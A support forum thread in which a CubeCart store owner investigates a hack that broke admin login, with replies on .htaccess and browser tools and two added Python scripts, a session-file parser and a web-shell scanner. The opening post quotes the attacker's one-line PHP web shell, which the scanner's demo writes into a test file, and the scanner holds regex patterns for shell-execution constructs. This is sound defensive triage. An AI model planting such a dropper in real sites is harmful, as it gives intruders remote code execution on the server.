islander Posted October 19, 2021

Last week I upgraded from v6.4.2 to v6.4.4. Everything seemed to be working fine until after the weekend. Now when I enter username/password and click to log in I get a white screen. When I use the password change form, the same thing happens--I click, it seems to submit the form just fine, but all I see is a white screen. I've tried checking the error_log but there is nothing. I've tried enabling "display_errors" in debug.class.php, but nothing. I've also checked to see if something was reconfigured on the hosted server, but no.

I'm pretty sure I've been hacked, because I checked the /includes/extra folder and found an /includes/extra-BAD folder as well. Inside the /extra-BAD folder was a snippet file I didn't recognize and a public key code file and some sess_ files. The snippet file contained just one line of PHP code:

eval($_REQUEST["4ikT7"])

Here's a sample sess_ file content:

__client|a:5:{s:10:"ip_address";s:14:"208.115.113.85";s:9:"useragent";s:90:"Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, [email protected])";s:13:"session_start";i:1451332019;s:12:"session_last";i:1451332019;s:8:"language";s:5:"en-US";}__system|a:1:{s:5:"token";s:32:"21828537828a8497b3b39a0f63864d74";}__recaptcha|a:2:{s:5:"error";N;s:9:"confirmed";b:0;}

The final "error" was in all of them. I've removed the alien files and folder from the server, of course, but I still can't log in. Any ideas? I didn't see any unfamiliar files in /images so not sure if the snippet was used to redirect to other servers or if I've got hacked content someplace else. I could really use help on this one.

Thanks,
Nancy
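The sess_ files quoted above are PHP session files: each variable is written as NAME|serialized-value, back to back, in PHP's serialize() format. When triaging a compromised store it helps to turn those files into readable fields (client IP, user agent, when the session was created, whether the login captcha was ever confirmed) instead of eyeballing the raw text. The parser below is an added example written for this thread, not CubeCart code or the forum poster's; the sample session is constructed from the content quoted above, with the user-agent shortened so the declared byte length is exact (the email address in the original was not legible here).

```python
"""Triage of PHP session files (the sess_* files described in the post).

PHP stores each session variable as NAME|<serialized value>, concatenated.
parse_value handles the serialize() types that appear in such files:
string (s), integer (i), boolean (b), float (d), null (N) and array (a).
"""
from datetime import datetime, timezone

# Constructed sample modelled on the sess_ content quoted in the post.
# The user-agent is shortened to 36 bytes so the s:36 length is correct.
SAMPLE_SESSION = (
    '__client|a:5:{s:10:"ip_address";s:14:"208.115.113.85";'
    's:9:"useragent";s:36:"Mozilla/5.0 (compatible; DotBot/1.1)";'
    's:13:"session_start";i:1451332019;s:12:"session_last";i:1451332019;'
    's:8:"language";s:5:"en-US";}'
    '__system|a:1:{s:5:"token";s:32:"21828537828a8497b3b39a0f63864d74";}'
    '__recaptcha|a:2:{s:5:"error";N;s:9:"confirmed";b:0;}'
)


def parse_value(s, i):
    """Parse one serialized value starting at offset i; return (value, next offset)."""
    t = s[i]
    if t == "N":                                   # N;
        return None, i + 2
    if t in ("i", "b", "d"):                       # i:123;  b:0;  d:1.5;
        end = s.index(";", i)
        text = s[i + 2:end]
        if t == "d":
            return float(text), end + 1
        num = int(text)
        return (bool(num) if t == "b" else num), end + 1
    if t == "s":                                   # s:LEN:"...";  (LEN is in bytes)
        colon = s.index(":", i + 2)
        length = int(s[i + 2:colon])
        start = colon + 2                          # skip :"
        # Slicing by the declared length is what makes quotes or ';' inside
        # the string (e.g. in a user-agent) harmless to the parser.
        return s[start:start + length], start + length + 2   # skip ";
    if t == "a":                                   # a:COUNT:{key value key value ...}
        colon = s.index(":", i + 2)
        count = int(s[i + 2:colon])
        j = colon + 2                              # skip :{
        out = {}
        for _ in range(count):
            key, j = parse_value(s, j)
            val, j = parse_value(s, j)
            out[key] = val
        return out, j + 1                          # skip }
    raise ValueError(f"unsupported serialize() type {t!r} at offset {i}")


def parse_session(raw):
    """Split NAME|value pairs and parse each value."""
    result = {}
    i = 0
    while i < len(raw):
        bar = raw.index("|", i)
        name = raw[i:bar]
        value, i = parse_value(raw, bar + 1)
        result[name] = value
    return result


def load_session_file(path):
    """Read a sess_* file; latin-1 keeps one char per byte so PHP's byte lengths line up."""
    with open(path, "rb") as fh:
        return parse_session(fh.read().decode("latin-1"))


def summarize(session):
    """The fields that decide whether a stray session file is a crawler's
    leftover or evidence of someone actually using the site."""
    client = session.get("__client", {})
    start = client.get("session_start")
    started = (datetime.fromtimestamp(start, tz=timezone.utc).isoformat()
               if isinstance(start, int) else None)
    return {
        "ip": client.get("ip_address"),
        "useragent": client.get("useragent"),
        "started_utc": started,
        "recaptcha_confirmed": bool(session.get("__recaptcha", {}).get("confirmed")),
    }


if __name__ == "__main__":
    print(summarize(parse_session(SAMPLE_SESSION)))
```

Run it over every sess_ file that was recovered from the odd folder (load_session_file) and sort by started_utc: the session_start value in the quoted sample converts to late December 2015, which tells you whether those files date from the incident or are much older leftovers.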
Tony Posted October 19, 2021

@Al Brookbanks for attention

When you upgraded, did you remove the 'setup' folder?
islander (Author) Posted October 19, 2021

Yes. I'm always very careful about that. I also double checked the global.inc.php file. Thanks for the suggestion, though!
islander (Author) Posted October 19, 2021

I'm following some 2016 instructions for cleaning a hacked store: Step 7 is "If you are not able to login to the admin side of your store please reset the login via the database." The link to resetting the login yields a 404 error. I think I've done it correctly, though, to change the password, but still can't log into the admin area. Grr.
bsmither Posted October 19, 2021

Does the storefront work?

Do you happen to have the CubeCart Security Suite module installed?

If there is no error_log, then it may be the case that the web server is disagreeing with something in the .htaccess file (assuming you are using Apache web server) - that is, before PHP even starts up and gets a chance to report anything to the error_log.
islander (Author) Posted October 19, 2021

Yes, the storefront works, except customers can't change their passwords. No, I don't have it but will certainly check out the Security Suite as soon as I can get in to admin to install it. Yes, I'm using a hosted Apache server. I've checked some of the .htaccess files, but will do that again and more thoroughly. Thanks!
islander (Author) Posted October 19, 2021

Is it generally safe to delete files and folders that were used in previous versions but not the latest? Omitting things like user files such as images, of course. For example, I have a /phpMailer folder on the server, but the latest version doesn't have that but has /PHPMailer instead. Is it safe to delete the /phpMailer folder? I'm trying to get as close to a clean install as possible. Thanks for the help.
bsmither Posted October 19, 2021

You can delete the oldest folder (which should be phpMailer - note the lowercase php).

Not being able to log in vs. getting a white screen after submitting the form to do so are two different things. A failed login attempt will be shown to you. A white screen means something went wrong (as opposed to being denied).

Your browser will have a Developer's Tools set of functions. One is a 'Network' tab where one can see what got posted and what was returned, if anything. Aside from the content, there will be a collection of HTTP headers in the response. Importantly, there will be the "Response status" code from the web server. That code will either be, commonly: 200, 500, or 304. A status of 500 is trouble - somewhere.
islander (Author) Posted October 19, 2021

I found some php files in a subdirectory /cache/controllers that I don't see in recent versions. They had to do primarily with admin sessions. I've removed them.

Thanks for the tip about the Developer's Tools. I had forgotten about that. I'll check it now.
islander (Author) Posted October 19, 2021

With Developer Tools in Chrome, I get response status 200 on both the login page and the white screen after I submit the login. Here's the headers from after the login is submitted (with username/password removed, but it was listed correctly--I also altered the admin page name, but it too was listed correctly). I don't see any obvious errors but I don't know how to interpret parts of it.

Request URL: https://www.treefrogfarm.com/store/admin_xxx.php
Request Method: POST
Status Code: 200
Remote Address: 216.92.173.98:443
Referrer Policy: strict-origin-when-cross-origin

Response Headers
cache-control: pre-check=0, post-check=0, max-age=0
content-encoding: gzip
content-type: text/html; charset=UTF-8
date: Tue, 19 Oct 2021 21:50:43 GMT
expires: -1
pragma: no-cache
server: Apache
set-cookie: CCS_B0C4C3B217=bca7de24aee9eb9bf3f50f1e0d9025d6; expires=Tue, 26-Oct-2021 21:50:43 GMT; Max-Age=604800; path=/store; domain=.treefrogfarm.com; secure; HttpOnly; SameSite=None
vary: Accept-Encoding
x-frame-options: SAMEORIGIN
x-powered-by: PHP/7.4.24

Request Headers
:authority: www.treefrogfarm.com
:method: POST
:path: /store/admin_xxx.php
:scheme: https
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cache-control: no-cache
content-length: 176
content-type: application/x-www-form-urlencoded
cookie: CCS_B0C4C3B217=5fd53b369b82009b0ed9e34c5de6ddf7; __utmc=183381347; __utmz=183381347.1630434710.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __zlcmid=165kKkjobQZfVNO; _ga=GA1.2.290882159.1630434710; PHPSESSID=f4d343e193cb3f424f941320669d06c5; __utma=183381347.290882159.1630434710.1634628236.1634671021.12
origin: https://www.treefrogfarm.com
pragma: no-cache
referer: https://www.treefrogfarm.com/store/admin_xxx.php
sec-ch-ua: "Chromium";v="94", "Google Chrome";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?1
sec-ch-ua-platform: "Android"
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: same-origin
sec-fetch-user: ?1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Mobile Safari/537.36

Form Data (URL-encoded)
username: xxxxxxxx
password: xxxxxxxxxxxxxxxx
redir: https://www.treefrogfarm.com/store/admin_xxx.php?_g=login
login: Log In
token: d6652a13b7cdc75d9bc2e897c76e0136
bsmither Posted October 19, 2021

In your .htaccess file, I think there must be this correct declaration:

RewriteBase /store/

Using an external database utility, look in the database table CubeCart_code_snippet. (Perhaps you have already done this, working through the 'Have I been hacked' knowledgebase article.) Look for any snippets here that you do not recognize.

The line (in Network Developer's Tools) that follows the POST entry... you say it also has a 200 Status? Does the Network screen have a panel that shows you the content that was delivered?
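The advice to look for snippets you do not recognize applies to the file system as much as to the CubeCart_code_snippet table: the dropper in the first post was a single eval($_REQUEST[...]) line sitting in a folder that does not ship with the product. The scanner below, an added example for this thread (not CubeCart code, not from the knowledgebase article), walks a web root and reports PHP files containing constructs that almost never appear in a shop's own code. The pattern names and the demo directory layout are constructed; the one-line dropper content is the one quoted in the first post. A hit is a lead to inspect by hand, not proof on its own, and a clean result does not prove the site is clean.

```python
"""Scan a web root for PHP files containing web-shell style constructs,
such as the eval($_REQUEST[...]) one-liner found under /includes/extra-BAD.
Added example for the thread; not part of CubeCart.
"""
import os
import re
import tempfile

# Constructs worth a manual look wherever they turn up. Names are ours.
SUSPICIOUS = {
    "eval_of_request_input":
        re.compile(r'\beval\s*\(\s*\$_(?:REQUEST|GET|POST|COOKIE)\b'),
    "eval_of_decoded_payload":
        re.compile(r'\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\('),
    "shell_command_from_request_input":
        re.compile(r'\b(?:system|exec|shell_exec|passthru|popen|proc_open)'
                   r'\s*\(\s*\$_(?:REQUEST|GET|POST|COOKIE)\b'),
    "function_named_by_request_input":
        re.compile(r'\$_(?:REQUEST|GET|POST|COOKIE)\s*\[[^\]]*\]\s*\('),
}


def scan_file(path):
    """Return one finding per (line, pattern) match in a single PHP file."""
    findings = []
    with open(path, "rb") as fh:
        for lineno, raw in enumerate(fh, 1):
            line = raw.decode("utf-8", errors="replace")
            for name, rx in SUSPICIOUS.items():
                if rx.search(line):
                    findings.append({"path": path, "line": lineno,
                                     "pattern": name, "text": line.strip()[:120]})
    return findings


def scan_tree(root, exts=(".php", ".phtml", ".inc")):
    """Walk root and scan every file with a PHP-like extension."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for fn in sorted(filenames):
            if fn.lower().endswith(exts):
                findings.extend(scan_file(os.path.join(dirpath, fn)))
    return findings


def build_demo_tree():
    """Constructed layout mirroring the post: a harmless file under
    includes/extra and the quoted one-liner under includes/extra-BAD.
    Written to a temporary directory that no web server serves."""
    root = tempfile.mkdtemp(prefix="cc_scan_")
    good = os.path.join(root, "includes", "extra")
    bad = os.path.join(root, "includes", "extra-BAD")
    os.makedirs(good)
    os.makedirs(bad)
    with open(os.path.join(good, "hooks.php"), "w") as fh:
        fh.write('<?php\n$title = "Welcome";\necho htmlspecialchars($title);\n')
    with open(os.path.join(bad, "snippet.php"), "w") as fh:
        fh.write('<?php eval($_REQUEST["4ikT7"]); ?>\n')
    return root


if __name__ == "__main__":
    for f in scan_tree(build_demo_tree()):
        print(f"{f['path']}:{f['line']} [{f['pattern']}] {f['text']}")
```

Point scan_tree at the store's document root after restoring a known-good copy of the application files; anything it reports in a directory that should only hold images, cache data or sessions deserves the same treatment as the extra-BAD folder. Pair it with a file-by-file diff against a fresh download of the same CubeCart version, since a well-hidden dropper does not always use one of these patterns.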